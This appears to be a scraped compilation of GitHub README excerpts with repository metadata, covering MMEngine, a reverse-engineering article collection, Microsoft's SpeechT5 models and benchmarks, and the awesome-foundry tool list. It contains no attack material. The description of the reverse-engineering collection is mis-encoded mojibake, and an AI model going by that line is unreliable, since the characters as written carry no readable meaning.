- [Speed up Training](https://mmengine.readthedocs.io/en/latest/common_usage/speed_up_training.html)
- [Save Memory on GPU](https://mmengine.readthedocs.io/en/latest/common_usage/save_gpu_memory.html)

</details>

<details>
<summary>Design</summary>

- [Hook](https://mmengine.readthedocs.io/en/latest/design/hook.html)
- [Runner](https://mmengine.readthedocs.io/en/latest/design/runner.html)
- [Evaluation](https://mmengine.readthedocs.io/en/latest/design/evaluation.html)
- [Visualization](https://mmengine.readthedocs.io/en/latest/design/visualization.html)
- [Logging](https://mmengine.readthedocs.io/en/latest/design/logging.html)
- [Infer](https://mmengine.readthedocs.io/en/latest/design/infer.html)

</details>

<details>
<summary>Migration guide</summary>

- [Migrate Runner from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/runner.html)
- [Migrate Hook from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/hook.html)
- [Migrate Model from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/model.html)
- [Migrate Parameter Scheduler from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/param_scheduler.html)
- [Migrate Data Transform to OpenMMLab 2.0](https://mmengine.readthedocs.io/en/latest/migration/transform.html)

</details>

## Contributing

We appreciate all contributions to improve MMEngine. Please refer to [CONTRIBUTING.md](CONTRIBUTING.md) for the contributing guideline.

## Citation

If you find this project useful in your research, please consider citing:

```
@article{mmengine2022,
  title = {{MMEngine}: OpenMMLab Foundational Library for Training Deep Learning Models},
  author = {MMEngine Contributors},
  howpublished = {\url{https://github.com/open-mmlab/mmengine}},
  year={2022}
}
```

## License

This project is released under the [Apache 2.0 license](LICENSE).

## Ecosystem

- [APES: Attention-based Point Cloud Edge Sampling](https://github.com/JunweiZheng93/APES)
- [DiffEngine: diffusers training toolbox with mmengine](https://github.com/okotaku/diffengine)

## Projects in OpenMMLab

- [MIM](https://github.com/open-mmlab/mim): MIM installs OpenMMLab packages.
- [MMCV](https://github.com/open-mmlab/mmcv): OpenMMLab foundational library for computer vision.
- [MMEval](https://github.com/open-mmlab/mmeval): A unified evaluation library for multiple machine learning libraries.
- [MMPreTrain](https://github.com/open-mmlab/mmpretrain): OpenMMLab pre-training toolbox and benchmark.
- [MMagic](https://github.com/open-mmlab/mmagic): Open**MM**Lab **A**dvanced, **G**enerative and **I**ntelligent **C**reation toolbox.
- [MMDetection](https://github.com/open-mmlab/mmdetection): OpenMMLab detection toolbox and benchmark.
- [MMYOLO](https://github.com/open-mmlab/mmyolo): OpenMMLab YOLO series toolbox and benchmark.
- [MMDetection3D](https://github.com/open-mmlab/mmdetection3d): OpenMMLab's next-generation platform for general 3D object detection.
- [MMRotate](https://github.com/open-mmlab/mmrotate): OpenMMLab rotated object detection toolbox and benchmark.
- [MMTracking](https://github.com/open-mmlab/mmtracking): OpenMMLab video perception toolbox and benchmark.
- [MMPose](https://github.com/open-mmlab/mmpose): OpenMMLab pose estimation toolbox and benchmark.
- [MMSegmentation](https://github.com/open-mmlab/mmsegmentation): OpenMMLab semantic segmentation toolbox and benchmark.
- [MMOCR](https://github.com/open-mmlab/mmocr): OpenMMLab text detection, recognition, and understanding toolbox.
- [MMHuman3D](https://github.com/open-mmlab/mmhuman3d): OpenMMLab 3D human parametric model toolbox and benchmark.
- [MMSelfSup](https://github.com/open-mmlab/mmselfsup): OpenMMLab self-supervised learning toolbox and benchmark.
- [MMFewShot](https://github.com/open-mmlab/mmfewshot): OpenMMLab few-shot learning toolbox and benchmark.
- [MMAction2](https://github.com/open-mmlab/mmaction2): OpenMMLab's next-generation action understanding toolbox and benchmark.
- [MMFlow](https://github.com/open-mmlab/mmflow): OpenMMLab optical flow toolbox and benchmark.
- [MMDeploy](https://github.com/open-mmlab/mmdeploy): OpenMMLab model deployment framework.
- [MMRazor](https://github.com/open-mmlab/mmrazor): OpenMMLab model compression toolbox and benchmark.
- [Playground](https://github.com/open-mmlab/playground): A central hub for gathering and showcasing amazing projects built upon OpenMMLab.
OpenMMLab Foundational Library for Training Deep Learning Models
computer-vision,deep-learning,pytorch,ai,machine-learning,python
26
146
1,059
888
134
23
4
darbra/sperm
# ็ฒพๅฝฉ้€†ๅ‘ๆ–‡็ซ  ่ฟ™ไบ›ๅฅฝๆ–‡ๅ‡ๆฅ่‡ชๅ…ฌไผ—ๅทใ€52pojieใ€็œ‹้›ชใ€csdnใ€jianshu็ญ‰ๅนณๅฐ๏ผŒๅนถ้€š่ฟ‡็ฎ€ๆ‚ฆๅฏผๅ‡บmarkdown๏ผŒๅธŒๆœ›ๅœจไธ็ปๆ„้—ดๅฏน่€ๅธˆไปฌๆœ‰ๆ‰€ๅธฎๅŠฉใ€‚ ่ฟ™ไบ›ๅ€พๅ›Š็›ธๆŽˆ็š„ๅˆ†ไบซไป…็”จไบŽๅญฆไน ไบคๆต๏ผŒ่ฏทๅ‹ฟ็”จไบŽ้žๆณ•็”จ้€”๏ผŒๅฆๅˆ™ๅŽๆžœ่‡ช่ดŸใ€‚
ๆต่งˆ่ฟ‡็š„็ฒพๅฝฉ้€†ๅ‘ๆ–‡็ซ ๆฑ‡ๆ€ป๏ผŒๅ€ผๅพ—ไธ€็œ‹
frida,unidbg,crawler,spider,crawl
0
1
1
82
0
1
0
microsoft/SpeechT5
# SpeechT5

Unified-modal speech-text pre-training for spoken language processing:

> [**SpeechT5**](https://arxiv.org/abs/2110.07205) (```ACL 2022```): **SpeechT5: Unified-Modal Encoder-Decoder Pre-training for Spoken Language Processing**

> [**Speech2C**](https://arxiv.org/abs/2203.17113) (```INTERSPEECH 2022```): **Pre-Training Transformer Decoder for End-to-End ASR Model with Unpaired Speech Data**

> [**YiTrans**](https://arxiv.org/abs/2206.05777) (```IWSLT 2022```): **The YiTrans End-to-End Speech Translation System for IWSLT 2022 Offline Shared Task**

> [**SpeechUT**](https://arxiv.org/abs/2210.03730) (```EMNLP 2022```): **SpeechUT: Bridging Speech and Text with Hidden-Unit for Encoder-Decoder Based Speech-Text Pre-training**

> [**SpeechLM**](https://arxiv.org/abs/2209.15329) (```IEEE/ACM TASLP```): **SpeechLM: Enhanced Speech Pre-Training with Unpaired Textual Data**

> [**Speech2S**](https://arxiv.org/abs/2210.17027) (```ICASSP 2023```): **Joint Pre-Training with Speech and Bilingual Text for Direct Speech to Speech Translation**

> [**Prosody-SpeechT5**](https://ieeexplore.ieee.org/document/10096530/) (```ICASSP 2023```): **Prosody-aware SpeechT5 for Expressive Neural TTS**

> [**VATLM**](https://arxiv.org/abs/2211.11275) (```IEEE Transactions on Multimedia```): **VATLM: Visual-Audio-Text Pre-Training with Unified Masked Prediction for Speech Representation Learning**

> [**VALL-E X**](https://arxiv.org/abs/2303.03926) (```Arxiv 2023```): **Speak Foreign Languages with Your Own Voice: Cross-Lingual Neural Codec Language Modeling**

> [**VioLA**](https://arxiv.org/abs/2305.16107) (```Arxiv 2023```): **VioLA: Unified Codec Language Models for Speech Recognition, Synthesis, and Translation**

> [**WavLLM**](https://arxiv.org/abs/2404.00656) (```Arxiv 2024```): **WavLLM: Towards Robust and Adaptive Speech Large Language Model**

<!-- Model introductions, evaluation results, and model inference instructions are located in the corresponding folders. The source code is [https://github.com/microsoft/SpeechT5/tree/main/ModelName]. -->

## Update

- April, 2024: WavLLM [**Arxiv**](https://arxiv.org/abs/2404.00656).
- March, 2024: [**SpeechLM**](https://arxiv.org/abs/2209.15329) was accepted by IEEE/ACM Transactions on Audio, Speech, and Language Processing.
- May, 2023: VioLA [**Arxiv**](https://arxiv.org/abs/2305.16107).
- May, 2023: [**VATLM**](https://arxiv.org/abs/2211.11275) was accepted by IEEE Transactions on Multimedia.
- March, 2023: VALL-E X [**Arxiv**](https://arxiv.org/abs/2303.03926) and [**Demo**](https://aka.ms/vallex).
- February, 2023: [**Speech2S**](https://arxiv.org/abs/2210.17027) and [**Prosody-SpeechT5**](https://arxiv.org/abs/2211.11275) were accepted by ICASSP 2023.
- [HuggingFace Integration] February, 2023: [**SpeechT5**](https://aclanthology.org/2022.acl-long.393/) models are on [**HuggingFace**](https://huggingface.co/blog/speecht5).
- [Model Release] November, 2022: [**VATLM**](https://github.com/microsoft/SpeechT5/tree/main/VATLM) models are released.
- November, 2022: VATLM [**Arxiv**](https://arxiv.org/abs/2211.11275).
- November, 2022: Speech2S [**Arxiv**](https://arxiv.org/abs/2210.17027).
- [Model Release] October, 2022: [**SpeechUT**](https://github.com/microsoft/SpeechT5/tree/main/SpeechUT) models are released.
- October, 2022: [**SpeechUT**](https://arxiv.org/abs/2210.03730) was accepted by EMNLP 2022.
- [Model Release] October, 2022: [**SpeechLM**](https://github.com/microsoft/SpeechT5/tree/main/SpeechLM) models are released.
- September, 2022: SpeechLM [**Arxiv**](https://arxiv.org/abs/2209.15329).
- [Evaluation] June, 2022: The end-to-end ST system [**YiTrans**](https://arxiv.org/abs/2206.05777) achieved top results on [**IWSLT 2022**](https://iwslt.org/2022/offline) shared tasks.
- June, 2022: [**Speech2C**](https://www.isca-speech.org/archive/interspeech_2022/ao22_interspeech.html) was accepted by INTERSPEECH 2022.
- [Model Release] May, 2022: [**Speech2C**](https://github.com/microsoft/SpeechT5/tree/main/Speech2C) models are released.
- [Model Release] April, 2022: [**SpeechT5**](https://github.com/microsoft/SpeechT5/tree/main/SpeechT5) models are released.
- March, 2022: Speech2C [**Arxiv**](https://arxiv.org/abs/2203.17113).
- February, 2022: [**SpeechT5**](https://aclanthology.org/2022.acl-long.393/) was accepted by ACL 2022.
- October, 2021: SpeechT5 [**Arxiv**](https://arxiv.org/abs/2110.07205).

## Pre-Trained Models

| Model | Pre-training Dataset | Fine-tuning Dataset | Model |
| :------: | :----------------------------------------------: | :-----------------: | :-----: |
| SpeechT5 Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [LibriSpeech LM Dataset](https://www.openslr.org/11/) | - | [HuggingFace](https://huggingface.co/ajyy/SpeechT5/resolve/main/speecht5_base.pt)<br /> [Google Drive](https://drive.google.com/file/d/1Sq00uZ1pw6Z4OUaqhOWzQEJxIVWgAO5U/view?usp=sharing) |
| SpeechT5 Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [LibriSpeech LM Dataset](https://www.openslr.org/11/) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [HuggingFace](https://huggingface.co/ajyy/SpeechT5/resolve/main/speecht5_base_asr.pt)<br /> [Google Drive](https://drive.google.com/file/d/1qLKJ81JPWOGf1MHfjSmgtZyqqTqgI6kT/view?usp=sharing) |
| SpeechT5 Large | [60k hrs Libri-Light](https://github.com/facebookresearch/libri-light) + [LibriSpeech LM Dataset](https://www.openslr.org/11/) | - | [Google Drive](https://drive.google.com/file/d/1M79b1jetSPOVxWVMIX-y0URvDjNskZKp/view?usp=sharing) |
| Speech2C | [960 hrs LibriSpeech](http://www.openslr.org/12) | - | [Google Drive](https://drive.google.com/file/d/1nGZ0LWEwlLq2pz7o805YALsMr9irV0Za/view?usp=sharing) |
| Speech2C | [960 hrs LibriSpeech](http://www.openslr.org/12) | [10 hrs LibriSpeech](http://www.openslr.org/12) | [Google Drive](https://drive.google.com/file/d/1nWSAc-33LmcDQHzH8IjXVJsuk0JZTWgN/view?usp=sharing) |
| Speech2C | [960 hrs LibriSpeech](http://www.openslr.org/12) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Google Drive](https://drive.google.com/file/d/1LwbQ5Y3tKZoK3s1ayLQgsfLTFnmkKNZs/view?usp=sharing) |
| SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Google drive](https://drive.google.com/file/d/1iJvhSGghNrMT-wAY1nwVu2YaYuTy1pxx/view?usp=sharing) |
| SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Google drive](https://drive.google.com/file/d/1mH3N7iKMWYk3rSBJErQPYf3x5ugqDq5x/view?usp=sharing) |
| SpeechLM-H Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Google drive](https://drive.google.com/file/d/1eblW8U8f9t-NTuCNRrNHwr-8BeLAUAmQ/view?usp=sharing) |
| SpeechLM-H Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Google drive](https://drive.google.com/file/d/1vXyO5DolbiWiTYZ6pkkKQsu2wJetaPlv/view?usp=sharing) |
| SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-De CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] |
| SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-Ca CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] |
| SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-Ar CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] |
| SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-Tr CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] |
| SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | - | [Google drive](https://drive.google.com/file/d/1QjLIgTJKIylVIp5hUkfSjGPtz8Xo7Lky/view?usp=sharing) |
| SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [960 hrs LibriSpeech](http://www.openslr.org/12) | [Google drive](https://drive.google.com/file/d/1YZQDVv096o8Opt0RBnkRiZXYPRDqKZnP/view?usp=sharing) |
| SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-De CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/1qYygNWSc11TQbBI1OzC4ChlR-dNh8t9S/view?usp=sharing) |
| SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-Ca CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/162U88mwso2aVfzzPkEM2nP_vwTpcb57T/view?usp=sharing) |
| SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-Ar CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/1lbTSRXewEeb2t45URunD6EiJcbniyjWW/view?usp=sharing) |
| SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-Tr CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/1Er4I_jHS175pQQph223yKtiiLQ378VvH/view?usp=sharing) |
| SpeechUT Base (ASR) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Azure Storage] |
| SpeechUT Base (ASR) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Azure Storage] |
| SpeechUT Large (ASR) | [60k hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Azure Storage] |
| SpeechUT Large (ASR) | [60k hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [960 hrs LibriSpeech](http://www.openslr.org/12) | [Azure Storage] |
| SpeechUT Base (En-De) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [408 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [4.6M Text](https://www.statmt.org/wmt16/) | - | [Azure Storage] |
| SpeechUT Base (En-De) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [408 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [4.6M Text](https://www.statmt.org/wmt16/) | [En-De MuST-C v1](https://ict.fbk.eu/must-c/) | [Azure Storage] |
| SpeechUT Base (En-Es) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [504 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [15M Text](https://www.statmt.org/wmt13/) | - | [Azure Storage] |
| SpeechUT Base (En-Es) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [504 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [15M Text](https://www.statmt.org/wmt13/) | [En-Es MuST-C v1](https://ict.fbk.eu/must-c/) | [Azure Storage] |
| SpeechUT Base (En-Fr) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [492 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [40M Text](https://www.statmt.org/wmt14/) | - | [Azure Storage] |
| SpeechUT Base (En-Fr) | [960 hrs LibriSpeech](http://www.openslr.org/12) + [492 hrs MuST-C v1](https://ict.fbk.eu/must-c/) + [40M Text](https://www.statmt.org/wmt14/) | [En-Fr MuST-C v1](https://ict.fbk.eu/must-c/) | [Azure Storage] |

## SpeechT5 Introduction

Motivated by the success of T5 (Text-To-Text Transfer Transformer) in pre-trained natural language processing models, we propose a unified-modal SpeechT5 framework that explores encoder-decoder pre-training for self-supervised speech/text representation learning. The SpeechT5 framework consists of a shared encoder-decoder network and six modal-specific (speech/text) pre/post-nets. After preprocessing the input speech/text through the pre-nets, the shared encoder-decoder network models the sequence-to-sequence transformation, and then the post-nets generate the output in the speech/text modality based on the output of the decoder.

<img src="SpeechT5/speecht5_framework.png" alt="se" width="1000" />

Leveraging large-scale unlabeled speech and text data, we pre-train SpeechT5 to learn a unified-modal representation, hoping to improve the modeling capability for both speech and text. To align the textual and speech information into this unified semantic space, we propose a cross-modal vector quantization approach that randomly mixes up speech/text states with latent units as the interface between the encoder and decoder.

Extensive evaluations show the superiority of the proposed SpeechT5 framework on a wide variety of spoken language processing tasks, including automatic speech recognition, speech synthesis, speech translation, voice conversion, speech enhancement, and speaker identification.

<!-- Model introductions, evaluation results, and model inference instructions are located in the corresponding folders. The source code is here [https://github.com/microsoft/SpeechT5/tree/main/SpeechT5]. -->

## SpeechT5 Downstream Task Performance

We evaluate our models on typical spoken language processing tasks, including automatic speech recognition, text to speech, speech to text translation, voice conversion, speech enhancement, and speaker identification.

### Automatic Speech Recognition

Evaluation on the [LibriSpeech](http://www.openslr.org/12)

| Model | LM | dev-clean | dev-other | test-clean | test-other |
| ------------- | ------------- | ------ | ----- | ---- | ---- |
| wav2vec 2.0 Base | - | 6.1 | 13.5 | 6.1 | 13.3 |
| HuBERT Base | - | 5.5 | 13.1 | 5.8 | 13.3 |
| Baseline (w/o CTC) | - | 5.8 | 12.3 | 6.2 | 12.3 |
| Baseline | - | 4.9 | 11.7 | 5.0 | 11.9 |
| SpeechT5 (w/o CTC) | - | 5.4 | 10.7 | 5.8 | 10.7 |
| **SpeechT5** | - | **4.3** | **10.3** | **4.4** | **10.4** |
| DiscreteBERT | 4-gram | 4.0 | 10.9 | 4.5 | 12.1 |
| wav2vec 2.0 Base | 4-gram | 2.7 | 7.9 | 3.4 | 8.0 |
| HuBERT Base | 4-gram | 2.7 | 7.8 | 3.4 | 8.1 |
| wav2vec 2.0 Base | Transf. | 2.2 | 6.3 | 2.6 | 6.3 |
| Baseline | Transf. | 2.3 | 6.3 | 2.5 | 6.3 |
| **SpeechT5** | Transf. | **2.1** | **5.5** | **2.4** | **5.8** |

### Text-to-Speech

Evaluation on the [LibriTTS](http://www.openslr.org/60/)

| Model | Naturalness | MOS | CMOS |
| ------------- | ------------ | ------ | ----- |
| Ground Truth | - | 3.87 | - |
| Baseline | 2.76 | 3.56 | 0 |
| **SpeechT5** | 2.91 | **3.65** | **+0.290** |

### Speech Translation

Evaluation on the [MUST-C v1](https://ict.fbk.eu/must-c/)

| Model | EN-DE | EN-FR |
| ------------- | ------------ | ------ |
| Fairseq ST | 22.70 | 32.90 |
| ESPnet ST | 22.91 | 32.69 |
| Adapter Tuning | 24.63 | 34.98 |
| Baseline | 23.43 | 33.76 |
| SpeechT5 (w/o initializing decoder) | 24.44 | 34.5 |
| **SpeechT5** | **25.18** | **35.30** |

### Voice Conversion

Evaluation on the [CMU Arctic](http://www.festvox.org/cmu_arctic/)

| Model | WER | WER | MCD | MCD |
| ------------- | ------ | ----- | ---- | ---- |
| | bdl to slt | clb to slt | bdl to slt | clb to slt |
| VTN w/ ASR | 11.1 | 10.9 | 6.5 | 6.11 |
| VTN w/ TTS | 7.6 | 9.1 | 6.33 | 13.3 |
| Many-to-many VTN | - | - | 6.13 | 5.97 |
| Baseline | 21.5 | 10.8 | 6.26 | 6.16 |
| **SpeechT5** | **7.8** | **6.4** | **5.93** | **5.87** |

### Speech Enhancement

Evaluation on the [WSJ0 Hipster Ambient Mixtures (WHAM!)](http://wham.whisper.ai/)

| Model | WER |
| ------------- | ------------ |
| Ground Truth Speech | 3.2 |
| Noisy Speech | 76.1 |
| Baseline | 10.9 |
| **SpeechT5** | **8.9** |

### Speaker Identification

Evaluation on the [VoxCeleb1](https://www.robots.ox.ac.uk/~vgg/data/voxceleb/vox1.html)

| Model | Acc |
| ------------- | ------------ |
| SUPERB, wav2vec 2.0 Base | 75.18% |
| SUPERB, HuBERT Base | 81.42% |
| SUPERB, HuBERT Large | 90.33% |
| SpeechNet, single task | 86.00% |
| SpeechNet, multi-task with TTS | 87.90% |
| Thin ResNet-34 | 89.00% |
| Baseline | 91.92% |
| **SpeechT5** | **96.49%** |

## License

This project is licensed under the license found in the LICENSE file in the root directory of this source tree. Portions of the source code are based on the [FAIRSEQ](https://github.com/pytorch/fairseq) and [ESPnet](https://github.com/espnet/espnet) projects.

[Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct)

### Reference

If you find our work useful in your research, please cite the following papers:

```bibtex
@article{Ao2021SpeechT5,
  title   = {SpeechT5: Unified-Modal Encoder-Decoder Pre-training for Spoken Language Processing},
  author  = {Junyi Ao and Rui Wang and Long Zhou and Chengyi Wang and Shuo Ren and Yu Wu and Shujie Liu and Tom Ko and Qing Li and Yu Zhang and Zhihua Wei and Yao Qian and Jinyu Li and Furu Wei},
  eprint={2110.07205},
  archivePrefix={arXiv},
  primaryClass={eess.AS},
  year={2021}
}
```

```bibtex
@article{Ao2022Speech2C,
  title   = {Pre-Training Transformer Decoder for End-to-End ASR Model with Unpaired Speech Data},
  author  = {Junyi Ao and Ziqiang Zhang and Long Zhou and Shujie Liu and Haizhou Li and Tom Ko and Lirong Dai and Jinyu Li and Yao Qian and Furu Wei},
  eprint={2203.17113},
  archivePrefix={arXiv},
  primaryClass={cs.SD},
  year={2022}
}
```

```bibtex
@article{Zhang2022Yitrans,
  title   = {The YiTrans End-to-End Speech Translation System for IWSLT 2022 Offline Shared Task},
  author  = {Zhang, Ziqiang and Ao, Junyi and Zhou, Long and Liu, Shujie and Wei, Furu and Li, Jinyu},
  eprint={2206.05777},
  archivePrefix={arXiv},
  primaryClass={cs.CL},
  year={2022}
}
```

```bibtex
@article{zhang2022speechut,
  title   = {SpeechUT: Bridging Speech and Text with Hidden-Unit for Encoder-Decoder Based Speech-Text Pre-training},
  author  = {Zhang, Ziqiang and Zhou, Long and Ao, Junyi and Liu, Shujie and Dai, Lirong and Li, Jinyu and Wei, Furu},
  eprint={2210.03730},
  archivePrefix={arXiv},
  primaryClass={cs.CL},
  year={2022}
}
```

```bibtex
@article{zhang2022speechlm,
  title   = {SpeechLM: Enhanced Speech Pre-Training with Unpaired Textual Data},
  author  = {Zhang, Ziqiang and Chen, Sanyuan and Zhou, Long and Wu, Yu and Ren, Shuo and Liu, Shujie and Yao, Zhuoyuan and Gong, Xun and Dai, Lirong and Li, Jinyu and Wei, Furu},
  eprint={2209.15329},
  archivePrefix={arXiv},
  primaryClass={cs.CL},
  year={2022}
}
```

### Contact Information

For help or issues using SpeechT5 models, please submit a GitHub issue.

For other communications related to SpeechT5, please contact Long Zhou (`lozhou@microsoft.com`).
Unified-Modal Speech-Text Pre-Training for Spoken Language Processing
speech-pretraining,speech2c,speecht5,speechlm,speechut,speech-recognition,speech-synthesis,speech-translation,speech-text-pretraining,vallex
0
13
5
242
34
3
0
crisgarner/awesome-foundry
# Awesome Foundry

[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)
[![Telegram Chat](https://img.shields.io/endpoint?color=neon&url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Ffoundry_rs)](https://t.me/foundry_rs)
[![Telegram Chat](https://img.shields.io/endpoint?color=neon&url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Ffoundry_support)](https://t.me/foundry_support)

[//]: # '[![Track Awesome List](https://www.trackawesomelist.com/badge.svg)](https://www.trackawesomelist.com/avelino/awesome-go/)'

Foundry is a blazing fast, portable and modular toolkit for Ethereum application development written in Rust. [Install Foundry here](https://getfoundry.sh).

<img align="center" src="https://mirror.xyz/_next/image?url=https%3A%2F%2Fimages.mirror-media.xyz%2Fpublication-images%2Fkt99mFtZZ1Gl2ZbWGNI3J.png&w=3840&q=90" alt="awesome-foundry" title="awesome-foundry" />

> A curated list of awesome Foundry resources, tutorials, tools and libraries. Inspired by [awesome-go](https://github.com/avelino/awesome-go).

### Contributing

Please take a quick look at the [contribution guidelines](https://github.com/crisgarner/awesome-foundry/blob/main/CONTRIBUTING.md) first.

[//]: # 'Thanks to all [contributors](https://github.com/crisgarner/awesome-foundry/graphs/contributors); you rock!'

#### _If you see a package or project here that is no longer maintained or is not a good fit, please submit a pull request to improve this file. Thank you!_

## Content

- [Awesome Foundry](#awesome-foundry)
  - [Contributing](#contributing)
  - [Content](#content)
  - [Tools](#tools)
  - [Templates \& Libraries](#templates--libraries)
  - [Tutorials](#tutorials)
  - [Projects Using Foundry](#projects-using-foundry)

**[⬆ back to top](#awesome-foundry)**

## Tools

Frameworks, plugins and utilities for Foundry.

- [Audit_Helper](https://github.com/HardlyCodeMan/audit_helper) - audit_helper is a Python3 helper script for Linux to automate some Foundry boilerplate setup in audit repositories.
- [Blacksmith](https://github.com/blacksmith-eth/blacksmith) - Blacksmith generates a simple frontend for interacting with smart contracts.
- [Chisel](https://github.com/foundry-rs/foundry/tree/master/chisel) - Chisel is a fast, utilitarian, and verbose Solidity REPL. It is heavily inspired by the incredible work done in soli and solidity-shell!
- [Foundryup](https://github.com/foundry-rs/foundry/tree/master/foundryup) - Update or revert to a specific Foundry branch with ease.
- [Foundry Hardhat](https://github.com/foundry-rs/hardhat) - Hardhat plugins to use Foundry tools in Hardhat environments.
- [Forge Deploy](https://github.com/wighawag/forge-deploy) - A CLI and associated contracts to keep track of deployments by name and reuse them in Solidity. It tries to keep compatibility with hardhat-deploy as far as possible (work in progress).
- [Forge Standard Library](https://github.com/foundry-rs/forge-std/) - Collection of helpful contracts for use with forge and foundry.
- [Forge GHA](https://github.com/foundry-rs/foundry-toolchain) - Simple GitHub Actions workflow to run forge test.
- [Forge Replit](https://replit.com/@wilsonc/VanillaForge) - Run Forge in the browser, vanilla setup.
- [Forge Safe](https://github.com/ind-igo/forge-safe) - Forge Safe lets Forge users build Gnosis Safe batch transactions using Forge scripting in Solidity.
- [Forge Safer](https://github.com/morpho-labs/safer) - Safer lets users create transactions on a Safe without relying on Safe's backend, improving the resiliency of Safe multisigs.
- [Forge Snippets](https://github.com/crisgarner/VSCodeForgeSnippets) - VS Code Snippets for Forge.
- [ForGePT](https://forgept.apoorv.xyz/) - AI bot to provide support and answer Foundry-related questions.
- [Foundrydeploy](https://github.com/joshieDo/foundrydeploy) - Limited scripting (declarative?) language to implement a basic deployment pipeline using Foundry.
- [Foundry Docgen](https://github.com/ZeframLou/foundry-docgen) - A basic tool for generating markdown docs for a Foundry project using existing NatSpec comments in the contracts.
- [Foundry Gas Diff Reporter](https://github.com/Rubilmax/foundry-gas-diff) - GitHub Action to easily compare gas reports generated by Foundry automatically on each of your pull requests.
- [Foundry toolchain Action](https://github.com/foundry-rs/foundry-toolchain) - This GitHub Action installs Foundry, the blazing fast, portable and modular toolkit for Ethereum application development.
- [Foundry Canary](https://github.com/ZeframLou/foundry-canary) - A minimal foundry repo setup for examples and finding bugs.
- [Forge Proposal Simulator](https://github.com/solidity-labs-io/forge-proposal-simulator) - A tool to write, simulate and test governance proposals.
- [Foundry zkSync Era](https://github.com/matter-labs/foundry-zksync) - This repository provides Foundry functionality in Solidity for compiling, deploying, and interacting with smart contracts on zkSync Era.
- [Femplate](https://github.com/abigger87/femplate/) - Robust template for Foundry projects.
- [Halmos](https://github.com/a16z/halmos#readme) - Symbolic bounded model checker for Ethereum smart contract bytecode.
- [Hardhat Foundry](https://github.com/NomicFoundation/hardhat/releases/tag/%40nomicfoundation/hardhat-foundry%401.0.0) - This plugin makes it easier to use Hardhat and Foundry in the same project. You can use it both for adding Foundry to an existing Hardhat project and for adding Hardhat to an existing Foundry project.
- [Paradigm CTF Template](https://github.com/zobront/paradigm-ctf) - Template for efficient Paradigm CTF testing & scripts.
- [Quick POC](https://github.com/zobront/quickpoc) - Easy PoC template generation from the command line.
- [Solplot](https://github.com/0xClandestine/solplot) - A Foundry plugin that enables you to plot charts within Solidity.
- [Vulcan](https://github.com/nomoixyz/vulcan) - Development framework for Foundry projects, with a focus on developer experience and readability.

## Templates & Libraries

Solidity templates, libraries or utilities that use Foundry.

- [Zefram's Foundry Template](https://github.com/ZeframLou/foundry-template) - @ZeframLou's Foundry template.
